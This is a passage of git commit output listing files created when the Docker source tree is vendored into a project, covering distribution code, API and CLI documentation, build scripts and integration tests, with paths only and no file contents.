 create mode 100644 vendor/github.com/docker/docker/distribution/metadata/metadata.go
 create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go
 create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go
 create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go
 create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go
 create mode 100644 vendor/github.com/docker/docker/distribution/pull.go
 create mode 100644 vendor/github.com/docker/docker/distribution/pull_v1.go
 create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2.go
 create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2_test.go
 create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2_unix.go
 create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2_windows.go
 create mode 100644 vendor/github.com/docker/docker/distribution/push.go
 create mode 100644 vendor/github.com/docker/docker/distribution/push_v1.go
 create mode 100644 vendor/github.com/docker/docker/distribution/push_v2.go
 create mode 100644 vendor/github.com/docker/docker/distribution/push_v2_test.go
 create mode 100644 vendor/github.com/docker/docker/distribution/registry.go
 create mode 100644 vendor/github.com/docker/docker/distribution/registry_unit_test.go
 create mode 100644 vendor/github.com/docker/docker/distribution/utils/progress.go
 create mode 100644 vendor/github.com/docker/docker/distribution/xfer/download.go
 create mode 100644 vendor/github.com/docker/docker/distribution/xfer/download_test.go
 create mode 100644 vendor/github.com/docker/docker/distribution/xfer/transfer.go
 create mode 100644 vendor/github.com/docker/docker/distribution/xfer/transfer_test.go
 create mode 100644 vendor/github.com/docker/docker/distribution/xfer/upload.go
 create mode 100644 vendor/github.com/docker/docker/distribution/xfer/upload_test.go
 create mode 100644 vendor/github.com/docker/docker/dockerversion/useragent.go
 create mode 100644 vendor/github.com/docker/docker/dockerversion/version_lib.go
 create mode 100644 vendor/github.com/docker/docker/docs/README.md
 create mode 100644 vendor/github.com/docker/docker/docs/api/v1.18.md
 create mode 100644 vendor/github.com/docker/docker/docs/api/v1.19.md
 create mode 100644 vendor/github.com/docker/docker/docs/api/v1.20.md
 create mode 100644 vendor/github.com/docker/docker/docs/api/v1.21.md
 create mode 100644 vendor/github.com/docker/docker/docs/api/v1.22.md
 create mode 100644 vendor/github.com/docker/docker/docs/api/v1.23.md
 create mode 100644 vendor/github.com/docker/docker/docs/api/v1.24.md
 create mode 100644 vendor/github.com/docker/docker/docs/api/version-history.md
 create mode 100644 vendor/github.com/docker/docker/docs/deprecated.md
 create mode 100644 vendor/github.com/docker/docker/docs/extend/EBS_volume.md
 create mode 100644 vendor/github.com/docker/docker/docs/extend/config.md
 create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png
 create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_allow.png
 create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_chunked.png
 create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_connection_hijack.png
 create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_deny.png
 create mode 100644 vendor/github.com/docker/docker/docs/extend/index.md
 create mode 100644 vendor/github.com/docker/docker/docs/extend/legacy_plugins.md
 create mode 100644 vendor/github.com/docker/docker/docs/extend/plugin_api.md
 create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_authorization.md
 create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md
 create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_network.md
 create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_volume.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/builder.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/attach.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/build.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cli.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/commit.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cp.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/create.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/deploy.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/diff.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/events.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/exec.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/export.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/history.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/images.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/import.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/index.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/info.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/inspect.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/kill.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/load.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/login.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logout.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logs.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/menu.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_create.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_update.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pause.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/port.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/ps.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pull.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/push.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rename.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/restart.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rm.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rmi.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/run.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/save.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/search.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_create.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_update.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/start.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stats.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stop.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_df.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/tag.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/top.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/unpause.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/update.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/version.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/wait.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/glossary.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/index.md
 create mode 100644 vendor/github.com/docker/docker/docs/reference/run.md
 create mode 100644 vendor/github.com/docker/docker/docs/static_files/contributors.png
 create mode 100644 vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png
 create mode 100644 vendor/github.com/docker/docker/experimental/README.md
 create mode 100644 vendor/github.com/docker/docker/experimental/checkpoint-restore.md
 create mode 100644 vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md
 create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy
 create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png
 create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg
 create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy
 create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png
 create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg
 create mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy
 create mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png
 create mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg
 create mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy
 create mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png
 create mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg
 create mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy
 create mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png
 create mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg
 create mode 100644 vendor/github.com/docker/docker/experimental/vlan-networks.md
 create mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh
 create mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh
 create mode 100644 vendor/github.com/docker/docker/hack/Jenkins/readme.md
 create mode 100755 vendor/github.com/docker/docker/hack/dind
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/binaries-commits
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh
 create mode 100755 vendor/github.com/docker/docker/hack/generate-authors.sh
 create mode 100755 vendor/github.com/docker/docker/hack/generate-swagger-api.sh
 create mode 100644 vendor/github.com/docker/docker/hack/install.sh
 create mode 100644 vendor/github.com/docker/docker/hack/make.ps1
 create mode 100755 vendor/github.com/docker/docker/hack/make.sh
 create mode 100644 vendor/github.com/docker/docker/hack/make/.binary
 create mode 100644 vendor/github.com/docker/docker/hack/make/.binary-setup
 create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/compat
 create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/control
 create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion
 create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default
 create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init
 create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart
 create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install
 create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages
 create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst
 create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev
 create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docs
 create mode 100755 vendor/github.com/docker/docker/hack/make/.build-deb/rules
 create mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec
 create mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec
 create mode 100644 vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch
 create mode 100644 vendor/github.com/docker/docker/hack/make/.ensure-emptyfs
 create mode 100644 vendor/github.com/docker/docker/hack/make/.go-autogen
 create mode 100644 vendor/github.com/docker/docker/hack/make/.go-autogen.ps1
 create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-daemon-setup
 create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-daemon-start
 create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-daemon-stop
 create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-test-helpers
 create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc
 create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest
 create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.ico
 create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.png
 create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.rc
 create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/dockerd.rc
 create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/event_messages.mc
 create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/resources.go
 create mode 100644 vendor/github.com/docker/docker/hack/make/README.md
 create mode 100644 vendor/github.com/docker/docker/hack/make/binary
 create mode 100644 vendor/github.com/docker/docker/hack/make/binary-client
 create mode 100644 vendor/github.com/docker/docker/hack/make/binary-daemon
 create mode 100644 vendor/github.com/docker/docker/hack/make/build-deb
 create mode 100644 vendor/github.com/docker/docker/hack/make/build-integration-test-binary
 create mode 100644 vendor/github.com/docker/docker/hack/make/build-rpm
 create mode 100755 vendor/github.com/docker/docker/hack/make/clean-apt-repo
 create mode 100755 vendor/github.com/docker/docker/hack/make/clean-yum-repo
 create mode 100644 vendor/github.com/docker/docker/hack/make/cover
 create mode 100644 vendor/github.com/docker/docker/hack/make/cross
 create mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary
 create mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary-client
 create mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary-daemon
 create mode 100755 vendor/github.com/docker/docker/hack/make/generate-index-listing
 create mode 100644 vendor/github.com/docker/docker/hack/make/install-binary
 create mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-client
 create mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-daemon
 create mode 100644 vendor/github.com/docker/docker/hack/make/install-script
 create mode 100755 vendor/github.com/docker/docker/hack/make/release-deb
 create mode 100755 vendor/github.com/docker/docker/hack/make/release-rpm
 create mode 100644 vendor/github.com/docker/docker/hack/make/run
 create mode 100755 vendor/github.com/docker/docker/hack/make/sign-repos
 create mode 100755 vendor/github.com/docker/docker/hack/make/test-deb-install
 create mode 100644 vendor/github.com/docker/docker/hack/make/test-docker-py
 create mode 100755 vendor/github.com/docker/docker/hack/make/test-install-script
 create mode 100755 vendor/github.com/docker/docker/hack/make/test-integration-cli
 create mode 100644 vendor/github.com/docker/docker/hack/make/test-integration-shell
 create mode 100755 vendor/github.com/docker/docker/hack/make/test-old-apt-repo
 create mode 100644 vendor/github.com/docker/docker/hack/make/test-unit
 create mode 100644 vendor/github.com/docker/docker/hack/make/tgz
 create mode 100644 vendor/github.com/docker/docker/hack/make/ubuntu
 create mode 100755 vendor/github.com/docker/docker/hack/make/update-apt-repo
 create mode 100644 vendor/github.com/docker/docker/hack/make/win
 create mode 100755 vendor/github.com/docker/docker/hack/release.sh
 create mode 100644 vendor/github.com/docker/docker/hack/validate/.swagger-yamllint
 create mode 100644 vendor/github.com/docker/docker/hack/validate/.validate
 create mode 100755 vendor/github.com/docker/docker/hack/validate/all
 create mode 100755 vendor/github.com/docker/docker/hack/validate/compose-bindata
 create mode 100755 vendor/github.com/docker/docker/hack/validate/dco
 create mode 100755 vendor/github.com/docker/docker/hack/validate/default
 create mode 100755 vendor/github.com/docker/docker/hack/validate/default-seccomp
 create mode 100755 vendor/github.com/docker/docker/hack/validate/gofmt
 create mode 100755 vendor/github.com/docker/docker/hack/validate/lint
 create mode 100755 vendor/github.com/docker/docker/hack/validate/pkg-imports
 create mode 100755 vendor/github.com/docker/docker/hack/validate/swagger
 create mode 100755 vendor/github.com/docker/docker/hack/validate/swagger-gen
 create mode 100755 vendor/github.com/docker/docker/hack/validate/test-imports
 create mode 100755 vendor/github.com/docker/docker/hack/validate/toml
 create mode 100755 vendor/github.com/docker/docker/hack/validate/vendor
 create mode 100755 vendor/github.com/docker/docker/hack/validate/vet
 create mode 100755 vendor/github.com/docker/docker/hack/vendor.sh
 create mode 100644 vendor/github.com/docker/docker/image/fs.go
 create mode 100644 vendor/github.com/docker/docker/image/fs_test.go
 create mode 100644 vendor/github.com/docker/docker/image/image.go
 create mode 100644 vendor/github.com/docker/docker/image/image_test.go
 create mode 100644 vendor/github.com/docker/docker/image/rootfs.go
 create mode 100644 vendor/github.com/docker/docker/image/spec/v1.1.md
 create mode 100644 vendor/github.com/docker/docker/image/spec/v1.2.md
 create mode 100644 vendor/github.com/docker/docker/image/spec/v1.md
 create mode 100644 vendor/github.com/docker/docker/image/store.go
 create mode 100644 vendor/github.com/docker/docker/image/store_test.go
 create mode 100644 vendor/github.com/docker/docker/image/tarexport/load.go
 create mode 100644 vendor/github.com/docker/docker/image/tarexport/save.go
 create mode 100644 vendor/github.com/docker/docker/image/tarexport/tarexport.go
 create mode 100644 vendor/github.com/docker/docker/image/v1/imagev1.go
 create mode 100644 vendor/github.com/docker/docker/image/v1/imagev1_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/benchmark_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/check_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_swarm.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_unix.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_windows.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go
